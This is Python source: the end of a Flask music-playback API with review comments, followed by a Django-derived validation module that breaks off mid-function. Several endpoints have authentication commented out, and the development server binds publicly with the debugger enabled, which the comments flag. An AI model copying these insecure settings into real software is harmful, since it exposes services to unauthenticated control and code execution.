    regex = addRegex(request.json["pattern"])
    return regex
@app.route('/regex', methods=["DELETE"])
@nocache
@requireAdmin
def RemoveRegex():
    """
    Delete the regex identified by "key".  Requires admin authentication.

    Example request body:
    {
        "key": "1234"
    }
    """
    return removeRegex(request.json["key"])
###############
## Api Calls ##
###############
@app.route('/playback/add', methods=["POST"])
@nocache
#@requireAuth
def AddSong():
    """
    Add a song to the playback queue.

    Expects a JSON body: {"song": <song identifier>}.
    NOTE(review): the @requireAuth decorator is commented out, so this
    endpoint is currently unauthenticated despite the original
    "Requires Auth" docstring.
    """
    song = request.json['song']
    # Enable consume mode once, on the first add request.
    # NOTE(review): not thread-safe -- two concurrent first requests may
    # both call setConsume(); harmless only if setConsume is idempotent.
    if not app.hasSetConsume:
        setConsume()
        app.hasSetConsume = True
    return addSong(song)
@app.route('/playback/play', methods=["GET"])
@nocache
#@requireAdmin
def PlaySong():
    """Start playback.  NOTE(review): admin check is commented out."""
    return playSong()
@app.route('/playback/pause', methods=["GET"])
@nocache
#@requireAdmin
def PauseSong():
    """Pause playback.  NOTE(review): admin check is commented out."""
    return pauseSong()
@app.route('/playback/stop', methods=["GET"])
@nocache
@requireAdmin
def StopSong():
    """Stop playback.  Requires admin authentication."""
    return stopSong()
@app.route('/playback/next', methods=["GET"])
@nocache
@requireAdmin
def NextSong():
    """Skip to the next song.  Requires admin authentication."""
    return nextSong()
@app.route('/playback/clear', methods=["GET"])
@nocache
@requireAdmin
def ClearSongs():
    """Clear the playback queue.  Requires admin authentication."""
    return clearSongs()
@app.route('/playback/list', methods=["GET"])
@nocache
@requireAdmin
def GetTracks():
    """List the queued tracks.  Requires admin authentication."""
    return getTracks()
@app.route('/playback/state', methods=["GET"])
@nocache
@requireAdmin
def GetState():
    """Return the current playback state.  Requires admin authentication."""
    return getState()
@app.route('/volume/up', methods=["GET"])
@nocache
#@requireAdmin
def IncreaseVolume():
    """Raise the volume one step.  NOTE(review): admin check is commented out."""
    return increaseVolume()
@app.route('/volume/down', methods=["GET"])
@nocache
#@requireAdmin
def DecreaseVolume():
    """Lower the volume one step.  NOTE(review): admin check is commented out."""
    return decreaseVolume()
@app.route('/volume', methods=["GET"])
@nocache
#@requireAdmin
def GetVolume():
    """Return the current volume as JSON.  NOTE(review): admin check is commented out."""
    return jsonify(getVolume())
@app.route('/volume/<int:key>', methods=["GET"])
@nocache
#@requireAdmin
def SetVolume(key):
    """Set the volume to *key* and return the result as JSON.
    NOTE(review): admin check is commented out."""
    return jsonify(setVolume(key))
####################
## Build Database ##
####################
@app.route('/buildDb')
@nocache
#@requireAdmin
def BuildDb():
    """Rebuild the song database via SetUp.main().

    NOTE(review): the admin check is commented out, so any client can
    trigger a full rebuild.
    """
    SetUp.main()
    return "Database rebuilt"
# Development entry point.
# NOTE(review): debug=True must not ship to production -- the Werkzeug
# debugger allows arbitrary code execution, and 0.0.0.0 binds publicly.
if __name__ == "__main__":
    app.run(host='0.0.0.0', debug=True)
|
"""Validation code, much of it originally forked from Django."""
from __future__ import print_function
import six
# Import half of the friggin stdlib :)
import platform
import re
try:
# Python 2
from urllib2 import Request, OpenerDirector, \
HTTPErrorProcessor, UnknownHandler, HTTPHandler, \
HTTPDefaultErrorHandler, FTPHandler, HTTPSHandler
from urllib import quote
from urlparse import urlsplit, urlunsplit
except ImportError:
# Python 3
from urllib.request import Request, OpenerDirector, \
HTTPErrorProcessor, UnknownHandler, HTTPHandler, \
HTTPDefaultErrorHandler, FTPHandler, HTTPSHandler
from urllib.parse import quote, urlsplit, urlunsplit
import operator
import types
import datetime
from decimal import Decimal
import xml.parsers.expat
from numbers import Number
from functools import reduce
def validate_model_instance(model,
                            instance,
                            handle_none=False,
                            embedded_models=None,
                            callback=None):
    """Validate a single instance against a model definition.

    Required Arguments:
    * model - the model definition (dictionary or dictionary-like object)
    * instance - the instance (dictionary or dictionary-like object)
    Optional Arguments:
    * handle_none - set to True to allow None to always be valid data,
      default is False. Useful for data that came (at least at one time)
      from SQL.
    * embedded_models - a dictionary mapping model name to model
      definition, used to validate embedded instances.
    * callback - an optional callable invoked after validation as
      callback(is_valid, instance) instead of letting errors propagate.
    """
    validator = ModelValidator(model,
                               handle_none=handle_none,
                               embedded_models=embedded_models)
    if not callback:
        # No callback: let any ValidationError propagate to the caller.
        validator.validate_instance(instance)
        return
    try:
        validator.validate_instance(instance)
    except ValidationError:
        callback(False, instance)
    else:
        callback(True, instance)
def parse_instance(instance, result_set):
    """Add the models that an instance uses to result_set.

    Recursively walks *instance* (a dict), adding every '_model' value
    found at any depth -- including embedded instances held in dicts and
    in lists of dicts -- to *result_set* (a set).  Mutates result_set in
    place and returns None.
    """
    # dict.items() works on both Python 2 and 3; no need for six here.
    for key, value in instance.items():
        if key == '_model':
            result_set.add(value)
        if isinstance(value, dict):
            if '_model' in value:
                result_set.add(value['_model'])
            parse_instance(value, result_set)
        if isinstance(value, list):
            for item in value:
                if isinstance(item, dict):
                    parse_instance(item, result_set)
def validate_modification(model,
                          modification,
                          handle_none=False,
                          embedded_models=None,
                          callback=None):
    """Validate a modification document against *model*.

    Assumes the existing version of the instance has already been
    through validation.
    TODO: support embedded instances.
    """
    validator = ModelValidator(model,
                               handle_none=handle_none,
                               embedded_models=embedded_models)
    try:
        validator.validate_modification(model, modification)
    except ValidationError:
        if not callback:
            raise
        return callback(False, modification)
    if callback:
        return callback(True, modification)
class ModelValidator(object):
    """Validates instances according to a model.

    The model maps field names to field definitions (dicts with at
    least a 'field' key naming the field type); ``self.dispatch`` maps
    field type names to validator callables.
    """
    # Model keys that carry metadata rather than field definitions.
    _MODEL_META_KEYS = ('modeldescription', u'_id', '_permissions',
                        '_view', '_model')
    # Instance keys that carry metadata and are therefore not validated.
    _INSTANCE_META_KEYS = ('_id', '_meta', '_view', '_versional_comment',
                           '_operation', '_permissions')
    def __init__(self,
                 model,
                 handle_none=False,
                 dispatcher=None,
                 embedded_models=None):
        if dispatcher:
            self.dispatch = dispatcher
        else:
            self.dispatch = dict(DISPATCHER)
        self.model = model
        self.model_keys = set(model.keys())
        self.handle_none = handle_none
        self.embedded_models = embedded_models
        # set.discard() replaces the original try/remove/except-KeyError
        # blocks: remove the key if present, ignore it otherwise.
        for meta_key in self._MODEL_META_KEYS:
            self.model_keys.discard(meta_key)
    def do_dispatch(self, field_type, field_data):
        """Do the dispatch."""
        if field_type == 'Embedded' or field_type == 'EmbeddedList':
            # Embedded instances also need the embedded model definitions.
            return self.dispatch[field_type](field_data,
                                             self.embedded_models)
        self.dispatch[field_type](field_data)
    def validate_field(self, field_type, field_data):
        """Validate if the field_data is valid for the field_type."""
        try:
            self.do_dispatch(field_type, field_data)
        except ValidationError:
            # Optionally tolerate None (e.g. data imported from SQL).
            if field_data is None and self.handle_none:
                pass
            else:
                raise
    def validate_instance(self, instance):
        """Validate that the instance meets the requirements of the model.

        Raises OrphanedInstance when '_model' is missing, InvalidFields /
        MissingFields on key mismatches, and whatever the per-field
        validators raise for bad values.  Returns None on success.
        """
        instance_keys = set(instance.keys())
        try:
            instance_keys.remove('_model')
        except KeyError:
            raise OrphanedInstance('The instance does not have a model key.')
        for meta_key in self._INSTANCE_META_KEYS:
            instance_keys.discard(meta_key)
        # Sanity checks
        self.check_for_unknown_fields(instance_keys)
        self.check_for_missing_fields(instance_keys)
        # Check each remaining field value against its declared type.
        try:
            for field in instance_keys:
                self.validate_field(self.model[field]['field'],
                                    instance[field])
        except TypeError:
            print("Died on %s " % instance['_id'])
            print("Perhaps invalid model?")
            raise
        # All fields valid.
        return None
    def check_for_unknown_fields(self, instance_keys):
        """Check for nonsense extra fields."""
        extra_fields = instance_keys - self.model_keys
        if extra_fields:
            if len(extra_fields) == 1:
                raise InvalidFields(extra_fields.pop())
            raise InvalidFields(tuple(extra_fields))
    def check_for_missing_fields(self, instance_keys):
        """Some fields are allowed to be missing, others are just AWOL."""
        missing_fields = self.model_keys - instance_keys
        if not missing_fields:
            return
        # A field definition without a 'required' entry is treated as
        # required (this mirrors the original except-KeyError branch).
        awol = set(field for field in missing_fields
                   if self.model[field].get('required', True) == True)
        if awol:
            if len(awol) == 1:
                raise MissingFields(awol.pop())
            raise MissingFields(tuple(awol))
    def validate_modification(self, model, modification):
        """Validate a modification document (e.g. {'$set': {...}})."""
        for modification_name, \
                modification_value in modification.items():
            validator = MODIFICATION_DISPATCHER[modification_name]
            for tfield, value in modification_value.items():
                field, field_type = self.get_field(tfield, model)
                validator(self, model, field, field_type, value)
    def get_field(self, field, model):
        """If no dots, it is a top level field,
        otherwise look through the models for the field."""
        if '.' not in field:
            return field, model[field]['field']
        parts = field.split('.')
        field_name = parts.pop(-1)
        if field_name == '$':
            # Positional operator: the real field name precedes it.
            field_name = parts.pop(-1)
        model_name = parts.pop(-1)
        if model_name == '$':
            model_name = parts.pop(-1)
        if model_name in self.embedded_models:
            if field_name in self.embedded_models[model_name]:
                field = self.embedded_models[model_name][field_name]
        elif model_name in model:
            # Indirect reference: resolve via the 'resource' entry.
            real_model_name = model[model_name].get('resource', model_name)
            field = self.embedded_models[real_model_name][field_name]
        field_type = field['field']
        return field, field_type
def get_all_modification_modelnames(model, modification):
    """Get all model names from a modification.

    Returns a 2-tuple (real_models, unknown_keys): the resolved model
    names referenced by dotted field paths in *modification*, and any
    dotted-path components that could not be matched against *model*.
    """
    models = set()
    # Iterate the field dicts directly; the old six.iteritems() and the
    # write-only `tree` accumulator were dead weight.
    for field in modification.values():
        for fieldname in field:
            if '.' in fieldname:
                # Every path component before the final field name is a
                # candidate model name; '$' positional markers are noise.
                parts = [part for part in fieldname.split('.')
                         if part != '$']
                for part in parts[:-1]:
                    models.add(part)
    real_models = set()
    unknown_keys = set()
    for model_name in models:
        # Maybe it is a top level field
        if model_name in model:
            real_models.add(model[model_name].get('resource', model_name))
            continue
        # It is not a top level field
        if isinstance(model_name, int):
            # It is a positional operator, skip it
            continue
        # Not sure what it is yet.
        unknown_keys.add(model_name)
    # Get rid of anything we know about.
    # Maybe later we do something else
    unknown_keys = unknown_keys - real_models
    return list(real_models), list(unknown_keys)
class InvalidInstance(Exception):
    """An instance has not met the requirements of the model.

    If you do not care why an instance is invalid, you can
    use this superclass and it will catch all subclasses."""
    pass
class InvalidFields(InvalidInstance):
    """An instance has a field(s) which is not defined in the model."""
    pass
class MissingFields(InvalidInstance):
    """An instance is missing a field(s) which is required by the model."""
    pass
class OrphanedInstance(InvalidInstance):
    """An instance has no '_model' key associating it with a model."""
    pass
# User-agent header sent when URLValidator(verify_exists=True) fetches URLs.
URL_VALIDATOR_USER_AGENT = 'Django (http://www.djangoproject.com/)'
# Error-dict key under which non-field-specific messages are collected.
NON_FIELD_ERRORS = '__all__'
class ValidationError(Exception):
    """An error while validating data."""
    def __init__(self, message, code=None, params=None):
        """
        ValidationError can be passed any object that can be printed (usually
        a string), a list of objects or a dictionary.
        """
        super(ValidationError, self).__init__(message)
        # Always set code/params so attribute access is safe.  The
        # original only assigned them on the scalar-message path, so
        # list/dict messages produced instances missing both attributes.
        self.code = code
        self.params = params
        if isinstance(message, dict):
            self.message_dict = message
            # Reduce each list of messages into a single list.
            message = reduce(operator.add, message.values())
        if isinstance(message, list):
            self.messages = [force_unicode(msg) for msg in message]
        else:
            message = force_unicode(message)
            self.messages = [message]
    def __str__(self):
        # This is needed because, without a __str__(), printing an exception
        # instance would result in this:
        # AttributeError: ValidationError instance has no attribute 'args'
        # See http://www.python.org/doc/current/tut/node10.html#handling
        if hasattr(self, 'message_dict'):
            return repr(self.message_dict)
        return repr(self.messages)
    def __repr__(self):
        if hasattr(self, 'message_dict'):
            return 'ValidationError(%s)' % repr(self.message_dict)
        return 'ValidationError(%s)' % repr(self.messages)
    def update_error_dict(self, error_dict):
        """Update the error dict with messages.

        Per-field messages are merged under their field keys; plain
        messages go under NON_FIELD_ERRORS.  Returns the (possibly new)
        dict.
        """
        if hasattr(self, 'message_dict'):
            if error_dict:
                for k, value in self.message_dict.items():
                    error_dict.setdefault(k, []).extend(value)
            else:
                error_dict = self.message_dict
        else:
            error_dict[NON_FIELD_ERRORS] = self.messages
        return error_dict
# These values, if given to validate(), will trigger the self.required check.
EMPTY_VALUES = (None, '', [], (), {})
class RegexValidator(object):
    """
    A validator is a callable that takes a value and raises a
    ValidationError if it doesn't meet some criteria.
    Validators can be useful for re-using validation logic
    between different types of fields.
    Parameters:
    regex -- If not None, overrides regex.
    Can be a regular expression string or a pre-compiled regular expression.
    message -- If not None, overrides message.
    code -- If not None, overrides code.
    regex
    The regular expression pattern to search for the provided value,
    or a pre-compiled regular expression.
    Raises a ValidationError with message and code if no match is found.
    By default, matches any string (including an empty string).
    message
    The error message used by ValidationError if validation fails.
    Defaults to "Enter a valid value".
    code
    The error code used by ValidationError if validation fails.
    Defaults to "invalid".
    """
    regex = ''
    message = u'Enter a valid value.'
    code = 'invalid'
    def __init__(self, regex=None, message=None, code=None):
        if regex is not None:
            self.regex = regex
        if message is not None:
            self.message = message
        if code is not None:
            self.code = code
        # Compile the regex if it was not passed pre-compiled.  The
        # original tested isinstance(self.regex, basestring), which
        # raises NameError on Python 3; checking for a missing `search`
        # attribute works for str/unicode/bytes patterns on both 2 and 3.
        if not hasattr(self.regex, 'search'):
            self.regex = re.compile(self.regex)
    def __call__(self, value):
        """
        Validates that the input matches the regular expression.
        """
        if not self.regex.search(smart_unicode(value)):
            raise ValidationError(self.message, code=self.code)
class URLValidator(RegexValidator):
    """
    A RegexValidator that ensures a value looks like a URL
    and optionally verifies that the URL actually exists
    (i.e., doesn't return a 404 status code).
    Raises an error code of 'invalid' if it doesn't look like a URL,
    and a code of 'invalid_link' if it doesn't exist.
    Parameters:
    verify_exists -- Sets verify_exists. Defaults to False.
    validator_user_agent -- Sets validator_user_agent.
    Defaults to URL_VALIDATOR_USER_AGENT or,
    if that setting is set to a null value,
    "Django (http://www.djangoproject.com/)".
    validator_user_agent
    If verify_exists is True, Django uses this value as
    the "User-agent" for the request.
    verify_exists
    If set to True, this validator checks that the URL actually exists
    and resolves, by issuing a request to it.
    This is really handy, but should only be used for trusted users,
    e,g. staff-only mode.
    If you allow public-facing code to use this, there is potential for
    a denial of service attack.
    This option is to be used between consenting adults only!
    This problem is particularly pronounced in Python 2.5 and below
    since the underlying socket libraries in Python do not have a timeout.
    This can manifest as a security problem in three different ways:
    1. An attacker can supply a slow-to-respond URL.
    Each request will tie up a server process for a period of time;
    if the attacker is able to make enough requests,
    they can tie up all available server processes.
    2. An attacker can supply a URL under his or her control,
    and which will simply hold an open connection indefinitely.
    Due to the lack of timeout, the Django process attempting to
    verify the URL will similarly spin indefinitely.
    Repeating this can easily tie up all available server processes.
    3. An attacker can supply a URL under his or her control which
    not only keeps the connection open, but also sends an unending
    stream of random garbage data.
    This data will cause the memory usage of the Django process
    (which will hold the response in memory) to grow without bound,
    thus consuming not only server processes but also server memory.
    Note, Python 2.5 is not actually supported by Magpy because of the
    Python 3 compatibility.
    For Python versions 2.6 and above, which support setting a timeout,
    a timeout of ten seconds will be set;
    Therefore only use in trusted contexts and where the utility
    is sufficient to warrant the potential risks it creates.
    """
    regex = re.compile(
        r'^(?:http|ftp)s?://' # http:// or https://
        r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)'
        r'+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain...
        r'localhost|' # localhost...
        r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
        r'(?::\d+)?' # optional port
        r'(?:/?|[/?]\S+)$', re.IGNORECASE)
    def __init__(self, verify_exists=False,
                 validator_user_agent=URL_VALIDATOR_USER_AGENT):
        super(URLValidator, self).__init__()
        self.verify_exists = verify_exists
        self.user_agent = validator_user_agent
    def __call__(self, value):
        # First try the plain regex; on failure, retry with the domain
        # part IDNA-encoded (internationalised domain names).
        try:
            super(URLValidator, self).__call__(value)
        except ValidationError as excptn:
            # Trivial case failed. Try for possible IDN domain
            if value:
                value = smart_unicode(value)
                scheme, \
                netloc, \
                path, \
                query, \
                fragment = urlsplit(value)
                try:
                    netloc = netloc.encode('idna') # IDN -> ACE
                except UnicodeError: # invalid domain part
                    raise excptn
                url = urlunsplit((scheme,
                                  netloc,
                                  path,
                                  query,
                                  fragment))
                super(URLValidator, self).__call__(url)
            else:
                raise
        else:
            url = value
        if self.verify_exists:
            import warnings
            warnings.warn(
                "The URLField verify_exists argument has intractable security "
                "and performance issues. Accordingly, it has been deprecated.",
                DeprecationWarning
                )
            headers = {
                "Accept": "text/xml,application/xml,application/xhtml+xml,"
                          "text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
                "Accept-Language": "en-us,en;q=0.5",
                "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
                "Connection": "close",
                "User-Agent": self.user_agent,
                }
            url = url.encode('utf-8')
            # Quote characters from the unreserved set, refs #16812
            url = quote(url, "!*'();:@&=+$,/?#[]")
            broken_error = ValidationError(
                u'This URL appears to be a broken link.',
                code='invalid_link')
            try:
                req = Request(url, None, headers)
                req.get_method = lambda: 'HEAD'
                #Create an opener that does not support local file access
                opener = OpenerDirector()
                #Don't follow redirects, but don't treat them as errors either
                error_nop = lambda *args, **kwargs: True
                http_error_processor = HTTPErrorProcessor()
                http_error_processor.http_error_301 = error_nop
                http_error_processor.http_error_302 = error_nop
                http_error_processor.http_error_307 = error_nop
                handlers = [UnknownHandler(),
                            HTTPHandler(),
                            HTTPDefaultErrorHandler(),
                            FTPHandler(),
                            http_error_processor]
                try:
                    import ssl
                except ImportError:
                    # Python isn't compiled with SSL support
                    pass
                else:
                    handlers.append(HTTPSHandler())
                list(map(opener.add_handler, handlers))
                # NOTE(review): python_version_tuple() returns a tuple of
                # *strings* (e.g. ('2', '7', '10')), so comparing it with
                # (2, 6) is a bug: on Python 2 the str-vs-int tuple
                # comparison is vacuously True, and on Python 3 it raises
                # TypeError.  Only reached when verify_exists=True.
                if platform.python_version_tuple() >= (2, 6):
                    opener.open(req, timeout=10)
                else:
                    opener.open(req)
            except ValueError:
                raise ValidationError(u'Enter a valid URL.', code='invalid')
            except: # urllib2.URLError, httplib.InvalidURL, etc.
                # NOTE(review): deliberately broad -- any network-level
                # failure is reported as a broken link.
                raise broken_error
class EmailValidator(RegexValidator):
    """
    A RegexValidator instance that ensures a value looks like an email address.
    """
    def __call__(self, value):
        try:
            super(EmailValidator, self).__call__(value)
        except ValidationError as excptn:
            # Trivial case failed; without an '@' there is nothing more
            # to try, so re-raise immediately.
            if not value or u'@' not in value:
                raise
            # Retry with the domain part IDNA-encoded (IDN domains).
            address_parts = value.split(u'@')
            try:
                address_parts[-1] = address_parts[-1].encode('idna')
            except UnicodeError:
                raise excptn
            super(EmailValidator, self).__call__(u'@'.join(address_parts))
# RFC 2822-style e-mail pattern: dot-atom or quoted-string local part,
# followed by a domain name or a bracketed IPv4 literal.
EMAIL_RE = re.compile(
    r"(^[-!#$%&'*+/=?^_`{}|~0-9A-Z]+"
    r"(\.[-!#$%&'*+/=?^_`{}|~0-9A-Z]+)*" # dot-atom
    # quoted-string, see also http://tools.ietf.org/html/rfc2822#section-3.2.5
    r'|^"([\001-\010\013\014\016-\037!#-\[\]-\177]|'
    r'\\[\001-\011\013\014\016-\177])*"'
    r')@((?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+[A-Z]{2,6}\.?$)' # domain
    r'|\[(25[0-5]|2[0-4]\d|[0-1]?\d?\d)'
    r'(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\]$',
    re.IGNORECASE) # literal form, ipv4 address (SMTP 4.1.3)
validate_email = EmailValidator(EMAIL_RE,
                                u'Enter a valid e-mail address.',
                                'invalid')
# Slug: letters, digits, underscores and hyphens only.
slug_re = re.compile(r'^[-\w]+$')
validate_slug = RegexValidator(
    slug_re,
    u"Enter a valid 'slug' consisting of letters, numbers, "
    u"underscores or hyphens.",
    'invalid')
# Dotted-quad IPv4 address; each octet constrained to 0-255.
ipv4_re = re.compile(r'^(25[0-5]|2[0-4]\d|[0-1]?\d?\d)'
                     r'(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}$')
validate_ipv4_address = RegexValidator(ipv4_re,
                                       'Enter a valid IPv4 address.',
                                       'invalid')
def validate_ipv6_address(value):
    """
    Check the validity of an IPv6 address.

    Delegates to is_valid_ipv6_address(); raises ValidationError with
    code 'invalid' when the check fails.
    """
    if not is_valid_ipv6_address(value):
        raise ValidationError('Enter a valid IPv6 address.',
                              code='invalid')
def validate_ipv46_address(value):
    """
    Uses both validate_ipv4_address and validate_ipv6_address
    to ensure a value is either a valid IPv4 or IPv6 address.
    """
    try:
        validate_ipv4_address(value)
        return  # valid IPv4 -- done
    except ValidationError:
        pass
    try:
        validate_ipv6_address(value)
    except ValidationError:
        # Neither form matched; report a combined error.
        raise ValidationError(u'Enter a valid IPv4 or IPv6 address.',
                              code='invalid')
# Maps the GenericIPAddressField `protocol` option to the validator list
# it should apply, plus the error message used when validation fails.
ip_address_validator_map = {
    'both': ([validate_ipv46_address],
             'Enter a valid IPv4 or IPv6 address.'),
    'ipv4': ([validate_ipv4_address],
             'Enter a valid IPv4 address.'),
    'ipv6': ([validate_ipv6_address],
             'Enter a valid IPv6 address.'),
}
def ip_address_validators(protocol, unpack_ipv4):
    """
    Depending on the given parameters returns the appropriate validators for
    the GenericIPAddressField.
    This code is here, because it is exactly the same for the
    model and the form field.

    Raises ValueError for an unknown protocol, or when unpack_ipv4 is
    combined with a protocol other than 'both'.
    """
    if protocol != 'both' and unpack_ipv4:
        raise ValueError(
            "You can only use `unpack_ipv4` if `protocol` is set to 'both'")
    try:
        return ip_address_validator_map[protocol.lower()]
    except KeyError:
        raise ValueError("The protocol '%s' is unknown. Supported: %s"
                         % (protocol, ip_address_validator_map.keys()))
# A RegexValidator instance that ensures a value is a comma-separated
# list of integers.
comma_separated_int_list_re = re.compile('^[\d,]+$')
validate_comma_separated_integer_list = RegexValidator(
    comma_separated_int_list_re,
    u'Enter only digits separated by commas.',
    'invalid')
class BaseValidator(object):
    """Base class of the validation classes defined below.

    Subclasses customise `compare` (when to fail), `clean` (how to
    normalise the value first), plus `message` and `code`.
    """
    message = u'Ensure this value is %(limit_value)s ' \
              u'(it is %(show_value)s).'
    code = 'limit_value'

    def compare(self, a, b):
        # Default comparison: fail unless it is the very same object.
        return a is not b

    def clean(self, x):
        # Default: validate the value as-is.
        return x

    def __init__(self, limit_value):
        self.limit_value = limit_value

    def __call__(self, value):
        cleaned = self.clean(value)
        params = {'limit_value': self.limit_value, 'show_value': cleaned}
        if not self.compare(cleaned, self.limit_value):
            return
        raise ValidationError(
            self.message % params,
            code=self.code,
            params=params,
        )
class MaxValueValidator(BaseValidator):
    """
    Raises a ValidationError with a code of 'max_value' if value is
    greater than max_value."""
    compare = lambda self, a, b: a > b
    message = u'Ensure this value is less than or equal to %(limit_value)s.'
    code = 'max_value'
class MinValueValidator(BaseValidator):
    """
    Raises a ValidationError with a code of 'min_value' if
    value is less than min_value.
    """
    compare = lambda self, a, b: a < b
    message = u'Ensure this value is greater than or ' \
              u'equal to %(limit_value)s.'
    code = 'min_value'
class MinLengthValidator(BaseValidator):
    """
    Raises a ValidationError with a code of 'min_length'
    if the length of value is less than min_length.
    """
    # clean() maps the value to its length before comparison.
    compare = lambda self, a, b: a < b
    clean = lambda self, x: len(x)
    message = u'Ensure this value has at least ' \
              u'%(limit_value)d characters (it has %(show_value)d).'
    code = 'min_length'
class MaxLengthValidator(BaseValidator):
    """
    Raises a ValidationError with a code of 'max_length' if the
    length of value is greater than max_length.
    """
    # clean() maps the value to its length before comparison.
    compare = lambda self, a, b: a > b
    clean = lambda self, x: len(x)
    message = u'Ensure this value has at most %(limit_value)d ' \
              u'characters (it has %(show_value)d).'
    code = 'max_length'
def smart_unicode(stringy_thingy,
                  encoding='utf-8',
                  strings_only=False,
                  errors='strict'):
    """
    Returns a unicode object representing 'stringy_thingy'.
    Treats bytestrings using the 'encoding' codec.
    If strings_only is True, don't convert (some) non-string-like objects.

    Thin wrapper: delegates to force_unicode() with identical arguments.
    """
    return force_unicode(stringy_thingy, encoding, strings_only, errors)
def smart_str(stringy_thingy,
              encoding='utf-8',
              strings_only=False,
              errors='strict'):
    """
    Returns a bytestring version of 'stringy_thingy',
    encoded as specified in 'encoding'.
    If strings_only is True, don't convert (some) non-string-like objects.
    smart_str is essentially the opposite of smart_unicode().
    It forces the first argument to a bytestring.
    The strings_only parameter has the same behavior as for
    smart_unicode() and force_unicode(). This is slightly different
    semantics from Python's builtin str() function,
    but the difference can be useful.

    NOTE(review): uses the Python-2-only builtins `basestring` and
    `unicode`; most code paths raise NameError on Python 3 despite the
    module's `six` import.  Needs porting before Py3 use.
    """
    if strings_only and isinstance(stringy_thingy, (type(None), int)):
        return stringy_thingy
    if not isinstance(stringy_thingy, basestring):
        try:
            return str(stringy_thingy)
        except UnicodeEncodeError:
            if isinstance(stringy_thingy, Exception):
                # An Exception subclass containing non-ASCII data that doesn't
                # know how to print itself properly. We shouldn't raise a
                # further exception.
                return ' '.join([smart_str(arg, encoding, strings_only,
                                           errors) for arg in stringy_thingy])
            return unicode(stringy_thingy).encode(encoding, errors)
    elif isinstance(stringy_thingy, unicode):
        return stringy_thingy.encode(encoding, errors)
    elif stringy_thingy and encoding != 'utf-8':
        # Already a Py2 bytestring in another encoding: transcode via UTF-8.
        return stringy_thingy.decode('utf-8', errors).encode(encoding, errors)
    else:
        return stringy_thingy
def is_protected_type(obj):
    """Determine if the object instance is of a protected type.

    Objects of protected types are preserved as-is when passed to
    force_unicode(strings_only=True).
    """
    # The original referenced the Python-2-only builtin `long`, which
    # raises NameError on Python 3; fall back to plain int there.
    try:
        integer_types = (int, long)
    except NameError:
        integer_types = (int,)
    return isinstance(obj, integer_types + (
        type(None),
        datetime.datetime, datetime.date, datetime.time,
        float, Decimal)
    )
class WrappedUnicodeDecodeError(UnicodeDecodeError):
    """A UnicodeDecodeError that also records the offending object."""

    def __init__(self, obj, *args):
        # Keep the object that failed to decode for diagnostics.
        self.obj = obj
        super(WrappedUnicodeDecodeError, self).__init__(*args)

    def __str__(self):
        base_message = super(WrappedUnicodeDecodeError, self).__str__()
        return '%s. You passed in %r (%s)' % (base_message, self.obj,
                                              type(self.obj))
def force_unicode(stringy_thingy,
                  encoding='utf-8',
                  strings_only=False,
                  errors='strict'):
    """
    Similar to smart_unicode, except that lazy instances are resolved to
    strings, rather than kept as lazy objects.
    If strings_only is True, don't convert (some) non-string-like objects.

    NOTE(review): relies on the Python-2-only builtins `unicode` and
    `basestring`; raises NameError on Python 3 despite the module's
    `six` import.  Needs porting before Py3 use.
    """
    # Handle the common case first, saves 30-40% in performance when s
    # is an instance of unicode. This function gets called often in that
    # setting.
    if isinstance(stringy_thingy, unicode):
        return stringy_thingy
    if strings_only and is_protected_type(stringy_thingy):
        return stringy_thingy
    try:
        if not isinstance(stringy_thingy, basestring,):
            if hasattr(stringy_thingy, '__unicode__'):
                stringy_thingy = unicode(stringy_thingy)
            else:
                try:
                    stringy_thingy = unicode(str(stringy_thingy),
                                             encoding,
                                             errors)
                except UnicodeEncodeError:
                    if not isinstance(stringy_thingy, Exception):
                        raise
                    # If we get to here, the caller has passed in an Exception
                    # subclass populated with non-ASCII data without special
                    # handling to display as a string. We need to handle this
                    # without raising a further exception. We do an
                    # approximation to what the Exception's standard str()
                    # output should be.
                    stringy_thingy = u' '.join([force_unicode(arg,
                                                              encoding,
                                                              strings_only,
                                                              errors) for \
                                                arg in stringy_thingy])
        elif not isinstance(stringy_thingy, unicode):
            # Note: We use .decode() here, instead of unicode(s, encoding,
            # errors), so that if s is a SafeString, it ends up being a
            # SafeUnicode at the end.
            stringy_thingy = stringy_thingy.decode(encoding, errors)
    except UnicodeDecodeError as excptn:
        if not isinstance(stringy_thingy, Exception):
            raise WrappedUnicodeDecodeError(stringy_thingy, *excptn.args)
        else:
            # If we get to here, the caller has passed in an Exception
            # subclass populated with non-ASCII bytestring data without a
            # working unicode method. Try to handle this without raising a
            # further exception by individually forcing the exception args
            # to unicode.
            stringy_thingy = u' '.join([force_unicode(arg,
                                                      encoding,
                                                      strings_only,
                                                      errors) for \
                                        arg in stringy_thingy])
    return stringy_thingy
# IP Address support
# This code was mostly based on ipaddr-py
# Copyright 2007 Google Inc. http://code.google.com/p/ipaddr-py/
# Licensed under the Apache License, Version 2.0 (the "License").
def clean_ipv6_address(ip_str, unpack_ipv4=False,
                       error_message="This is not a valid IPv6 address"):
    """Normalize and compress an IPv6 address string.

    Validity is checked with is_valid_ipv6_address(); an invalid
    address raises ValidationError(error_message).  The longest run of
    zero hextets is collapsed to "::", leading zeroes are stripped and
    all hextets are lowercased.

    Args:
        ip_str: A valid IPv6 address.
        unpack_ipv4: if an IPv4-mapped address is found,
            return the plain IPv4 address (default=False).
        error_message: message used in the raised ValidationError.
    Returns:
        A compressed IPv6 address (or the unpacked IPv4 address).
    """
    if not is_valid_ipv6_address(ip_str):
        raise ValidationError(error_message)

    # Work on the fully exploded form; normalise any IPv4-mapped tail
    # (::ffff:0a0a:0a0a -> ::ffff:10.10.10.10) first.
    ip_str = _explode_shorthand_ip_string(ip_str)
    ip_str = _sanitize_ipv4_mapping(ip_str)

    # If asked to, return the bare IPv4 address straight away.
    if unpack_ipv4:
        unpacked = _unpack_ipv4(ip_str)
        if unpacked:
            return unpacked

    hextets = ip_str.split(":")

    # Strip leading zeroes and track the longest run of all-zero
    # hextets -- the run that "::" will eventually replace.
    best_start, best_len = -1, 0
    run_start, run_len = -1, 0
    for pos, hextet in enumerate(hextets):
